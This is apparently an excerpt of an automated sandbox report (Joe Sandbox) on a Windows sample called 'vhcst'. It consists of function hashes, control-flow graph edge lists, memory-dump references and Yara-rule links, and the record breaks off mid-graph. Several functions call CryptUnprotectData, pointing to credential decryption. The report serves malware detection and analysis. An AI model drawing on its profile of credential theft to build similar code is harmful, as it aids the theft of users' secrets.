                                                                                      • Instruction ID: 70edacb939321bffe0f8d0519380dc71e0d686580587ffe0dfada931012ca499
                                                                                      • Opcode Fuzzy Hash: fde3ecf2aaaad768756710c4ac4fcf60d521b83d819ce0ddc2c4cd7befffcdb5
                                                                                      • Instruction Fuzzy Hash: 7D022671B0DA4D4FDBACDF6C94A56B977E1FF98304B0445BED00AC72A6CD26A842C781
                                                                                      Function 00007FFD99FE092D Relevance: 1.8, Strings: 1, Instructions: 560COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1559 7ffd99fe092d-7ffd99fe0930 1560 7ffd99fe0938-7ffd99fe0949 1559->1560 1561 7ffd99fe0932 1559->1561 1563 7ffd99fe094b-7ffd99fe0956 1560->1563 1564 7ffd99fe0997-7ffd99fe0aa8 1560->1564 1561->1560 1563->1564 1584 7ffd99fe0aaa-7ffd99fe0abd 1564->1584 1585 7ffd99fe0abf-7ffd99fe0b41 1564->1585 1584->1585 1595 7ffd99fe0b7c-7ffd99fe0bff 1585->1595 1596 7ffd99fe0b43-7ffd99fe0b76 1585->1596 1607 7ffd99fe0c49-7ffd99fe0c5c 1595->1607 1608 7ffd99fe0c01-7ffd99fe0c39 1595->1608 1596->1595 1609 7ffd99fe0cc3-7ffd99fe0cd4 1607->1609 1610 7ffd99fe0c5e-7ffd99fe0c99 1607->1610 1611 7ffd99fe0c3b-7ffd99fe0c3e 1608->1611 1612 7ffd99fe0ca2-7ffd99fe0cbc 1608->1612 1613 7ffd99fe0cdb-7ffd99fe0d08 call 7ffd99fdfc60 1609->1613 1614 7ffd99fe0cd6 1609->1614 1610->1612 1615 7ffd99fe0c44 call 7ffd99fdfe68 1611->1615 1616 7ffd99fe0d50-7ffd99fe0d6a 1611->1616 1612->1609 1618 7ffd99fe0d71-7ffd99fe0d82 1613->1618 1634 7ffd99fe0d0a-7ffd99fe0d47 1613->1634 1614->1613 1615->1607 1616->1618 1621 7ffd99fe0d89-7ffd99fe0d93 1618->1621 1622 7ffd99fe0d84 1618->1622 1624 7ffd99fe0d95-7ffd99fe0d97 1621->1624 1625 7ffd99fe0e04-7ffd99fe0e06 1621->1625 1622->1621 1627 7ffd99fe0d99 1624->1627 1628 7ffd99fe0e13-7ffd99fe0e15 1624->1628 1629 7ffd99fe0e08-7ffd99fe0e12 1625->1629 1630 7ffd99fe0e17 1625->1630 1632 7ffd99fe0d9b-7ffd99fe0d9d 1627->1632 1633 7ffd99fe0de0-7ffd99fe0de3 1627->1633 1635 7ffd99fe0e24-7ffd99fe0e2a 1628->1635 1629->1628 1636 7ffd99fe0e19-7ffd99fe0e1a 1630->1636 1632->1636 1639 7ffd99fe0d9f-7ffd99fe0da3 1632->1639 1637 7ffd99fe0df5-7ffd99fe0df7 1633->1637 1634->1616 1638 7ffd99fe0e2b-7ffd99fe0e36 1635->1638 1641 7ffd99fe0e1f-7ffd99fe0e21 1636->1641 1651 7ffd99fe0df8-7ffd99fe0e02 1637->1651 1642 7ffd99fe0e38-7ffd99fe0e45 1638->1642 1643 7ffd99fe0e47-7ffd99fe0e51 1638->1643 1639->1641 1644 7ffd99fe0da5 1639->1644 1641->1635 1654 7ffd99fe0e54-7ffd99fe0e6a 1642->1654 1643->1654 1648 7ffd99fe0dec-7ffd99fe0df4 1644->1648 1649 7ffd99fe0da7-7ffd99fe0daf 1644->1649 1648->1637 1649->1638 1653 7ffd99fe0db1 1649->1653 1651->1625 1653->1651 1655 7ffd99fe0db3-7ffd99fe0dd1 1653->1655 1660 7ffd99fe0e6c-7ffd99fe0e7a 1654->1660 1661 7ffd99fe0e7b-7ffd99fe0eb2 1654->1661 1656 7ffd99fe0de5-7ffd99fe0de9 1655->1656 1657 7ffd99fe0dd3-7ffd99fe0ddf 1655->1657 1656->1648 1657->1633 1660->1661
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 92_^
                                                                                      • API String ID: 0-980968609
                                                                                      • Opcode ID: 8610bf87d320c0aee3fa6e2cdd5518b66841627dce0648a9184aa8f59a55619d
                                                                                      • Instruction ID: eac594ddd226f199f4911dbfc7f3940a9c6ab3af91c1cc74707150f28cd44db7
                                                                                      • Opcode Fuzzy Hash: 8610bf87d320c0aee3fa6e2cdd5518b66841627dce0648a9184aa8f59a55619d
                                                                                      • Instruction Fuzzy Hash: C212FC32B0D6C68FE751EFB8D8B46E97BA0EF85318B0C41BAD098CB1D7DA246445C791
                                                                                      Function 00007FFD99FD270E Relevance: 1.7, APIs: 1, Instructions: 225encryptionCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1662 7ffd99fd270e-7ffd99fd27c9 call 7ffd99fd11e0 1677 7ffd99fd27cb 1662->1677 1678 7ffd99fd27cc-7ffd99fd27dd 1662->1678 1677->1678 1679 7ffd99fd27df 1678->1679 1680 7ffd99fd27e0-7ffd99fd28a1 CryptUnprotectData 1678->1680 1679->1680 1683 7ffd99fd28a9-7ffd99fd28d8 1680->1683 1684 7ffd99fd28a3 1680->1684 1684->1683
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID: CryptDataUnprotect
                                                                                      • String ID:
                                                                                      • API String ID: 834300711-0
                                                                                      • Opcode ID: 6f057c5053e630298c8ddc3103980dcfd6c2c3a373b3e3bf8b81407dbe0c107e
                                                                                      • Instruction ID: c2ef2f2c445628c7e77ca24e760245511fde4be10557ce5c5460bc9f276c316d
                                                                                      • Opcode Fuzzy Hash: 6f057c5053e630298c8ddc3103980dcfd6c2c3a373b3e3bf8b81407dbe0c107e
                                                                                      • Instruction Fuzzy Hash: 29510630A1CA4C4FDB58EF6C88156B9BBE0EF99314F0442BEE459C3297DE24A8458782
                                                                                      Function 00007FFD99FD26BE Relevance: 1.7, APIs: 1, Instructions: 222COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1686 7ffd99fd26be-7ffd99fd26cd 1687 7ffd99fd272a-7ffd99fd27c9 call 7ffd99fd11e0 1686->1687 1688 7ffd99fd26cf-7ffd99fd26d4 1686->1688 1702 7ffd99fd27cb 1687->1702 1703 7ffd99fd27cc-7ffd99fd27dd 1687->1703 1702->1703 1704 7ffd99fd27df 1703->1704 1705 7ffd99fd27e0-7ffd99fd2820 1703->1705 1704->1705 1707 7ffd99fd2827-7ffd99fd28a1 CryptUnprotectData 1705->1707 1708 7ffd99fd28a9-7ffd99fd28d8 1707->1708 1709 7ffd99fd28a3 1707->1709 1709->1708
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 743ebc9b556a6904c5712c56546aab85589465e5541de92feb8685c5e7550986
                                                                                      • Instruction ID: eec509fac55c54654ee2e6b2204b6abeb4ce92c740fbc69e1a3064562646a50e
                                                                                      • Opcode Fuzzy Hash: 743ebc9b556a6904c5712c56546aab85589465e5541de92feb8685c5e7550986
                                                                                      • Instruction Fuzzy Hash: EC512A31B0CA494FDB58EF6C98156B9BBE0EF99314F0442BFE059C3297DE24684587C2
                                                                                      Function 00007FFD99FD26F1 Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1711 7ffd99fd26f1-7ffd99fd2706 1712 7ffd99fd2708-7ffd99fd270d 1711->1712 1713 7ffd99fd2763-7ffd99fd27c9 1711->1713 1712->1713 1721 7ffd99fd27cb 1713->1721 1722 7ffd99fd27cc-7ffd99fd27dd 1713->1722 1721->1722 1723 7ffd99fd27df 1722->1723 1724 7ffd99fd27e0-7ffd99fd2820 1722->1724 1723->1724 1726 7ffd99fd2827-7ffd99fd28a1 CryptUnprotectData 1724->1726 1727 7ffd99fd28a9-7ffd99fd28d8 1726->1727 1728 7ffd99fd28a3 1726->1728 1728->1727
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: da5bf56d5136c7672e775ba43bccc80aec0539cf31a11aaf0d88ae21d32d0bfd
                                                                                      • Instruction ID: 6cd8408798a87046c182a57022ed68d8e2ed1eab16774637b99c93be6bef616d
                                                                                      • Opcode Fuzzy Hash: da5bf56d5136c7672e775ba43bccc80aec0539cf31a11aaf0d88ae21d32d0bfd
                                                                                      • Instruction Fuzzy Hash: 0E512B30A0CA894FDB59EF6C98156B9BBE0EF96315F0442BFE059C3297CA246855C7C3
                                                                                      Function 00007FFD99FE095D Relevance: 1.6, Strings: 1, Instructions: 342COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 92_^
                                                                                      • API String ID: 0-980968609
                                                                                      • Opcode ID: 92d14fceab5ede9a3181a485d1f9fe4d5220440433898391887b1fe9ccdc76d3
                                                                                      • Instruction ID: f596ebdf69a37f7b3b5b7359f394048c0be5c939fa36780f0bb048bffc345b6b
                                                                                      • Opcode Fuzzy Hash: 92d14fceab5ede9a3181a485d1f9fe4d5220440433898391887b1fe9ccdc76d3
                                                                                      • Instruction Fuzzy Hash: 56B1E627B0D2D69BE752BFBC98B41DA7F60DF82328B0D41F7D0D8860A7D9146445C7A2
                                                                                      Function 00007FFD99FE33A2 Relevance: 1.4, Instructions: 1433COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e975fdd89896820c64ead2e159b3603c58c4c7d60c9ac88401797a81701ff61e
                                                                                      • Instruction ID: b51552ea621e8f1212f921b7c96b3000e5680467b72bf0bf96cac779eee451ca
                                                                                      • Opcode Fuzzy Hash: e975fdd89896820c64ead2e159b3603c58c4c7d60c9ac88401797a81701ff61e
                                                                                      • Instruction Fuzzy Hash: 59B28130A08A4E8FDB98EF68C465AA977E1FF59304F5405ADD41ECB2D6CE35E842CB41
                                                                                      Function 00007FFD99E5CD70 Relevance: 1.3, Instructions: 1257COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0bc916c4216446fb27072c64c52acd27490c63342bcdc5b0090e55a652af74e3
                                                                                      • Instruction ID: 7ea5c9dc3d5a49a2c9069f04e4d5a87f730b44fbc62d7aeaf86dd726b26481bd
                                                                                      • Opcode Fuzzy Hash: 0bc916c4216446fb27072c64c52acd27490c63342bcdc5b0090e55a652af74e3
                                                                                      • Instruction Fuzzy Hash: 25928F30A1D7868BDB78DF5884957AAB3E1FF98714F10467DD48E83291DE35A842CB83
                                                                                      Function 00007FFD99E2BA00 Relevance: 1.0, Instructions: 955COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a096a0ba07d987a70e369e00d0f70850b69251d8737ea0f387f485a72930ce04
                                                                                      • Instruction ID: 33203144bb4601797fc764c5aef5742727f251f7bf259d3621555da0a4ac2978
                                                                                      • Opcode Fuzzy Hash: a096a0ba07d987a70e369e00d0f70850b69251d8737ea0f387f485a72930ce04
                                                                                      • Instruction Fuzzy Hash: 2052C571B0DE094FEBA8DE1894A567573D2FFA8309F1441BDD04EC72D6DE26AC428782
                                                                                      Function 00007FFD99E63D50 Relevance: .9, Instructions: 909COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 01b1c3a4cdfb5a84589bfcfaf034b6bc332c737a293fa7957e4c121971e9f15e
                                                                                      • Instruction ID: 5239868e51d2c920894489e71f26086c74906747247c9fcd2c3c2f58da9fdf69
                                                                                      • Opcode Fuzzy Hash: 01b1c3a4cdfb5a84589bfcfaf034b6bc332c737a293fa7957e4c121971e9f15e
                                                                                      • Instruction Fuzzy Hash: 70527231B1DE4A4FDBA8EE58C4A1A65B3E1FFA4308B14457DD04EC3596DE36F8428782
                                                                                      Function 00007FFD99E2B978 Relevance: .8, Instructions: 802COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d03d7cfe856a9096c9bee7a1e513a6002d55fcf2552b5c6ce11c346a285eb1e3
                                                                                      • Instruction ID: b2449699c3757d4d6caf887d233f13c7db0d8f8fd1ff86bed560470613374284
                                                                                      • Opcode Fuzzy Hash: d03d7cfe856a9096c9bee7a1e513a6002d55fcf2552b5c6ce11c346a285eb1e3
                                                                                      • Instruction Fuzzy Hash: 3F426370B19A0D8FEBA8DF58C4A5B68B7E1FFA8308F144179D04DD7296DE35A841CB42
                                                                                      Function 00007FFD99E47EA0 Relevance: .7, Instructions: 747COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ff5df1a26bcead4193c2de715940c208137e24b4ae03c6315601a6cb588dd999
                                                                                      • Instruction ID: d9f245ccea0184fbd3ec13d7890a9c663ba634a41ee032e015a57cb7041488cd
                                                                                      • Opcode Fuzzy Hash: ff5df1a26bcead4193c2de715940c208137e24b4ae03c6315601a6cb588dd999
                                                                                      • Instruction Fuzzy Hash: A132D030B1DA4D8FEBA4EF6CC8A5A6977E1FF59344F0401B9E44DC72A6CE25E8418742
                                                                                      Function 00007FFD99E63CD8 Relevance: .7, Instructions: 724COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7ce732bd1b965dee7f91296e2aa544bfa8496cb67b4ec0594bd4aec86b5a36f3
                                                                                      • Instruction ID: d110bed227d112be27477ae206761dde52f09abe14b827c32b3ec7884ed97c7e
                                                                                      • Opcode Fuzzy Hash: 7ce732bd1b965dee7f91296e2aa544bfa8496cb67b4ec0594bd4aec86b5a36f3
                                                                                      • Instruction Fuzzy Hash: 04423D30B19A098FEBA8DF58C4A5BA573E1FF68308F1441B9D44EC7295DE35B885CB42
                                                                                      Function 00007FFD99FE18C7 Relevance: .6, Instructions: 575COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: be2e262a704ffde59db69b3e2eb928756bd3cbb37340c14579b8a6527d448408
                                                                                      • Instruction ID: cc321c82db6a53f245884a315b4950cc8bf991effc9727e8aa6332b42e1753af
                                                                                      • Opcode Fuzzy Hash: be2e262a704ffde59db69b3e2eb928756bd3cbb37340c14579b8a6527d448408
                                                                                      • Instruction Fuzzy Hash: 4E022662B0E6850FD75A9FBC14A65B4BBD1EFAA21470845FEC08ACB1F3DD156846C382
                                                                                      Function 00007FFD99E300C8 Relevance: .6, Instructions: 556COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ee5014bade9eee5f28f96052fcaa06ceb026a347a837963f0dcbd7a9744be763
                                                                                      • Instruction ID: 8be5aa8ac3c2b74387be8b46debc536b115b402107cfc9bf7104750b07975d76
                                                                                      • Opcode Fuzzy Hash: ee5014bade9eee5f28f96052fcaa06ceb026a347a837963f0dcbd7a9744be763
                                                                                      • Instruction Fuzzy Hash: C0F13E52B0EAC90FE765EE7898B65F9BBD0DF51258B0801FFD089C71E7DD1968068342
                                                                                      Function 00007FFD99FDAEB2 Relevance: .5, Instructions: 509COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 25a6f499f9669bea9177e05ed939160c3b54a1991cef1eb194da54571ede6a72
                                                                                      • Instruction ID: ed833bb1003dc7b230ded3a636198511a3c155d6213ef67dcc10df57d92a0215
                                                                                      • Opcode Fuzzy Hash: 25a6f499f9669bea9177e05ed939160c3b54a1991cef1eb194da54571ede6a72
                                                                                      • Instruction Fuzzy Hash: 08F1F531F1C94A4FEB69EF6898756B8B7D1EF59319F0803B9D05DC7293DE24A8418382
                                                                                      Function 00007FFD99FDDFEC Relevance: .4, Instructions: 438COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5dcbd9489a646d4af87d49edddb7fc90e3f6b5380a919f8fd99889b27ff9de94
                                                                                      • Instruction ID: a0d3a90b790bd9e6d1258fe22557ba54a1aeb00df74df01eff42eb57fff68f33
                                                                                      • Opcode Fuzzy Hash: 5dcbd9489a646d4af87d49edddb7fc90e3f6b5380a919f8fd99889b27ff9de94
                                                                                      • Instruction Fuzzy Hash: A5D1D031B0CA494FE765EF688065679BBD1EF69318F0507BDD08EC76D2DE28B8428742
                                                                                      Function 00007FFD99FE518D Relevance: .4, Instructions: 366COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 60a07d3b19df2b0cd5acdf75bdce97b4bc84257ebefdf27cd3c5473b0763ce8e
                                                                                      • Instruction ID: 390aae3e7eae45ca745ef9cb99cdd49f52b7ab531f611b5053a50ea9c920972f
                                                                                      • Opcode Fuzzy Hash: 60a07d3b19df2b0cd5acdf75bdce97b4bc84257ebefdf27cd3c5473b0763ce8e
                                                                                      • Instruction Fuzzy Hash: E7B17C22F1DB865FE755AEB888A55F1BBE0EF9031871842BBD01DC30EADD2974068381
                                                                                      Function 00007FFD99FD9CE0 Relevance: .3, Instructions: 299COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1ef2142d9b778a0be0c714a0f50941d06e153109e6657d1021c153ed54952b06
                                                                                      • Instruction ID: 50d659f778b6d03a136bf37e0a470d1c7ce1c2ef39b437b1683fdf4eca5bef11
                                                                                      • Opcode Fuzzy Hash: 1ef2142d9b778a0be0c714a0f50941d06e153109e6657d1021c153ed54952b06
                                                                                      • Instruction Fuzzy Hash: 8E91E471F0895A4BFB68DEAC94752FDBBD1EF98314F04437AD04DD3286DE2968428782
                                                                                      Function 00007FFD99E22644 Relevance: .3, Instructions: 286COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 643be6fa1f8d358a8daa97b085078d3ab3176aaab676cb3766b7e77a7afc75b3
                                                                                      • Instruction ID: 940eda209d5104b4c2f9a1052995123fe143c9fe6eaf24238ec1c48279fa04c0
                                                                                      • Opcode Fuzzy Hash: 643be6fa1f8d358a8daa97b085078d3ab3176aaab676cb3766b7e77a7afc75b3
                                                                                      • Instruction Fuzzy Hash: 24812A3290E6C90FE76A9FB498651F97FE0EF46324F0401BBD449C7193D92A581A8793
                                                                                      Function 00007FFD99E2C758 Relevance: 3.3, Strings: 2, Instructions: 788COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 124 7ffd99e2c758-7ffd99e2c76a 126 7ffd99e2c76c-7ffd99e2c772 124->126 127 7ffd99e2c7b9-7ffd99e2c7be 124->127 128 7ffd99e2c774-7ffd99e2c7c6 126->128 129 7ffd99e2c7c1-7ffd99e2c7c2 126->129 127->129 136 7ffd99e2c7cd-7ffd99e2c7d9 128->136 131 7ffd99e2c7c4-7ffd99e2c7c6 129->131 132 7ffd99e2c811-7ffd99e2c812 129->132 131->136 134 7ffd99e2c814-7ffd99e2c840 132->134 135 7ffd99e2c861-7ffd99e2c862 132->135 137 7ffd99e2c864-7ffd99e2c87a 135->137 138 7ffd99e2c8b1-7ffd99e2c8b9 135->138 145 7ffd99e2c857-7ffd99e2c85e 136->145 146 7ffd99e2c7db-7ffd99e2c7e6 136->146 151 7ffd99e2c87c-7ffd99e2c8af 137->151 152 7ffd99e2c8c9 137->152 143 7ffd99e2c8bb-7ffd99e2c8d9 138->143 144 7ffd99e2c8e9-7ffd99e2c8f1 138->144 159 7ffd99e2c956-7ffd99e2c95e 143->159 160 7ffd99e2c8db-7ffd99e2c8e7 143->160 145->135 151->138 154 7ffd99e2c8cc-7ffd99e2c8d9 152->154 155 7ffd99e2c919-7ffd99e2c922 152->155 154->159 154->160 161 7ffd99e2c924-7ffd99e2c93a 155->161 162 7ffd99e2c971 155->162 164 7ffd99e2c960-7ffd99e2c966 159->164 165 7ffd99e2c96b-7ffd99e2c96e 159->165 160->144 166 7ffd99e2c972 162->166 164->166 181 7ffd99e2c968-7ffd99e2c96e 164->181 169 7ffd99e2c970-7ffd99e2c976 165->169 170 7ffd99e2c979-7ffd99e2c97a 165->170 171 7ffd99e2c974-7ffd99e2c976 166->171 172 7ffd99e2c9c1-7ffd99e2c9c7 166->172 175 7ffd99e2c980-7ffd99e2c986 169->175 176 7ffd99e2c978-7ffd99e2c97e 169->176 173 7ffd99e2c9c9 170->173 177 7ffd99e2c97c-7ffd99e2c97e 170->177 171->175 171->176 172->173 179 7ffd99e2c9cc-7ffd99e2c9f1 173->179 180 7ffd99e2ca19-7ffd99e2ca22 173->180 189 7ffd99e2c98e 175->189 190 7ffd99e2c988 175->190 176->175 178 7ffd99e2c987 176->178 177->175 177->178 185 7ffd99e2c98d 178->185 186 7ffd99e2ca24-7ffd99e2ca6a 180->186 187 7ffd99e2ca71-7ffd99e2ca72 180->187 181->169 181->170 185->189 211 7ffd99e2ca6c-7ffd99e2ca6e 186->211 212 7ffd99e2cab9-7ffd99e2cabe 186->212 192 7ffd99e2ca74-7ffd99e2ca8a 187->192 193 7ffd99e2cac1-7ffd99e2cac2 187->193 197 7ffd99e2c990 189->197 198 7ffd99e2c995-7ffd99e2c996 189->198 190->185 223 7ffd99e2ca8c-7ffd99e2cab6 192->223 224 7ffd99e2cad9 192->224 195 7ffd99e2cac4-7ffd99e2cad6 193->195 196 7ffd99e2cb11-7ffd99e2cb12 193->196 195->224 200 7ffd99e2cb14-7ffd99e2cb49 196->200 201 7ffd99e2cb61-7ffd99e2cb62 196->201 197->198 203 7ffd99e2c998-7ffd99e2c9ae 198->203 204 7ffd99e2c99c-7ffd99e2c9ae 198->204 220 7ffd99e2cbc4-7ffd99e2cc0f 200->220 245 7ffd99e2cb4b-7ffd99e2cb4e 200->245 207 7ffd99e2cb64-7ffd99e2cb72 201->207 208 7ffd99e2cbb1-7ffd99e2cbbf 201->208 209 7ffd99e2c9b5-7ffd99e2c9bf 203->209 204->209 214 7ffd99e2cb74-7ffd99e2cbae 207->214 215 7ffd99e2cbc1-7ffd99e2cbc2 207->215 208->215 209->172 211->187 212->193 214->208 215->220 221 7ffd99e2cc11-7ffd99e2cc7a 215->221 220->221 260 7ffd99e2cc7c-7ffd99e2ccc6 221->260 261 7ffd99e2ccc9 221->261 223->212 228 7ffd99e2cb54-7ffd99e2cb5e 224->228 229 7ffd99e2cadb-7ffd99e2cb00 224->229 228->201 249 7ffd99e2cb02-7ffd99e2cb05 229->249 250 7ffd99e2cb07-7ffd99e2cb0e 229->250 245->228 249->250 250->196 260->261 262 7ffd99e2cccc-7ffd99e2ccd1 261->262 263 7ffd99e2cd19-7ffd99e2cd22 261->263 264 7ffd99e2cd4a 262->264 267 7ffd99e2cd24-7ffd99e2cd49 263->267 268 